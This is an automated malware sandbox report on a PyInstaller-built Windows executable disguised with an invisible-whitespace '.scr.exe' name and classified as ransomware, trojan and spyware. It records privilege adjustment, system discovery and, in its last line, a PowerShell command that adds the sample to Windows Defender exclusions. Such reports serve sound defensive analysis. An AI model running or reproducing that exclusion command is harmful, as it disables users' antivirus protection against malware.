Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: #U202f#U202f#U2005#U00a0.scr.exe Binary or memory string: OriginalFilename vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037933852.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034682833.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035401905.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038915705.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042526776.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034476266.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035945476.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036561449.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037632410.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037785909.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035844726.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036690975.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037437086.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037218357.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038015630.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037713341.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037539805.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037350742.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035749504.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036215404.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034770359.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038812496.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036953380.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037858907.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035650264.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038238108.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038322803.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038599367.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034582747.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038707513.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000000.2032418452.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameMDMAgentj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibsslH vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038502657.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036066040.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035542606.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038406109.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_decimal.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037034859.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036777921.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038117369.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036870702.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037125137.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340140316.00007FF8A9398000.00000004.00000001.01000000.00000011.sdmp Binary or memory string: OriginalFilenamelibsslH vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343212572.00007FF8B984C000.00000004.00000001.01000000.0000000E.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342965199.00007FF8B93D8000.00000004.00000001.01000000.0000000D.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341048034.00007FF8B8CC3000.00000004.00000001.01000000.00000012.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336517828.00007FF8A86A9000.00000004.00000001.01000000.00000010.sdmp Binary or memory string: OriginalFilenamelibcryptoH vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340442986.00007FF8B7EEE000.00000002.00000001.01000000.00000004.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340792166.00007FF8B8B42000.00000004.00000001.01000000.0000000F.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339600779.00007FF8A8F2A000.00000004.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFilenamepython312.dll. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342336186.00007FF8B9094000.00000004.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341984089.00007FF8B906C000.00000004.00000001.01000000.00000013.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2333652744.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameMDMAgentj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341701034.00007FF8B8F9C000.00000004.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334206076.00007FF8A81AA000.00000004.00000001.01000000.00000014.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341319253.00007FF8B8CF3000.00000004.00000001.01000000.0000000B.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343410682.00007FF8B9F78000.00000004.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343586290.00007FF8BA259000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs #U202f#U202f#U2005#U00a0.scr.exe
Source: libcrypto-3.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
Source: libssl-3.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
Source: python312.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9992524518674001
Source: sqlite3.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9974527256801319
Source: unicodedata.pyd.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9951941924283154
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@144/95@2/2
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE18560 GetLastError,FormatMessageW,WideCharToMultiByte, 0_2_00007FF73AE18560
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7ECB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx, 68_2_00007FF7F7ECB57C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E9EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 68_2_00007FF7F7E9EF50
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EA3144 GetDiskFreeSpaceExW, 68_2_00007FF7F7EA3144
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Mutant created: \Sessions\1\BaseNamedObjects\x
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882 Jump to behavior
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U202f#U202f#U2005#U00a0.scr.exe ReversingLabs: Detection: 71%
Source: #U202f#U202f#U2005#U00a0.scr.exe Virustotal: Detection: 72%
Source: #U202f#U202f#U2005#U00a0.scr.exe String found in binary or memory: set-addPolicy
Source: #U202f#U202f#U2005#U00a0.scr.exe String found in binary or memory: id-cmc-addExtensions
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File read: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"
